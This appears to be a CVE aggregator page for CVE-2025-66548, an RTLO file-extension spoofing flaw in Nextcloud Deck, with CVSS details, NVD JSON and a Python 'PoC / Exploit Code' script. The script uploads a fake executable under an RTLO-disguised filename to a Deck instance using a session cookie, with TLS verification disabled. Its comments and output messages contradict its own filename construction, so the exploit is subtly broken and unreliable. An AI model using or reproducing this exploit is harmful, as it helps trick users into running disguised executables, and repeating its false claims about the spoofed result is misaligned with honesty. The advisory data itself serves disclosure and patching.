Security Vulnerability Report
中文
CVE-2025-66548 CVSS 3.3 LOW

CVE-2025-66548

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 19:01:55
Source: [email protected]

Description

Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, file extension can be spoofed by using RTLO characters, tricking users into download files with a different extension than what is displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Deck < 1.12.7
Nextcloud Deck < 1.14.4
Nextcloud Deck < 1.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2025-66548 PoC - File Extension Spoofing in Nextcloud Deck # RTLO character: U+202E (Right-to-Left Override) def create_spoofed_filename(): """ Generate a spoofed filename using RTLO character. Example: 'document.pdf' + RTLO + '.exe' displays as 'document.pdfxe' """ rtlo_char = '\u202e' # Creating filename that appears as .pdf but is actually .exe spoofed_name = f'document.pdf{rtlo_char}exe' return spoofed_name def exploit_nextcloud_deck(base_url, session_cookie): """ Exploit the RTLO file spoofing vulnerability in Nextcloud Deck. Args: base_url: Nextcloud instance URL session_cookie: Valid session cookie for authentication Returns: bool: True if upload successful, False otherwise """ headers = { 'Cookie': f'nc_session={session_cookie}', 'X-Requested-With': 'XMLHttpRequest' } spoofed_filename = create_spoofed_filename() # Malicious executable content malicious_content = b'MZ' + b'\x00' * 100 # Minimal PE header files = { 'files[]': (spoofed_filename, malicious_content, 'application/octet-stream') } upload_url = f'{base_url}/apps/deck/api/v1.0/attachments' try: response = requests.post( upload_url, headers=headers, files=files, verify=False ) if response.status_code == 200: print(f'[+] Successfully uploaded: {spoofed_filename}') print(f'[+] Users will see: document.pdf') print(f'[-] Actual file: document.pdf.exe') return True else: print(f'[-] Upload failed: {response.status_code}') return False except Exception as e: print(f'[-] Error: {str(e)}') return False # Usage example if __name__ == '__main__': # Replace with actual values BASE_URL = 'https://nextcloud.example.com' SESSION_COOKIE = 'your-session-cookie-here' print('CVE-2025-66548 - Nextcloud Deck RTLO File Spoofing') print('=' * 50) exploit_nextcloud_deck(BASE_URL, SESSION_COOKIE)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66548", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:57.967", "lastModified": "2025-12-09T19:01:55.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, file extension can be spoofed by using RTLO characters, tricking users into download files with a different extension than what is displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.7", "matchCriteriaId": "3CB27832-7EB0-4F3C-9D22-26F111728249"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.14.0", "versionEndExcluding": "1.14.4", "matchCriteriaId": "F630A529-C2EA-4308-AB37-D0A7424D4B46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.15.0", "versionEndExcluding": "1.15.1", "matchCriteriaId": "2B268E3B-B298-4A04-94E5-745CE0AD33C5"}]}]}], "references": [{"url": "https://github.com/nextcloud/deck/commit/afa95d3c507465b9d31af7c88c69b76711ef185a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/deck/pull/6671", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xjvq-xvr7-xpg6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/2326618", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.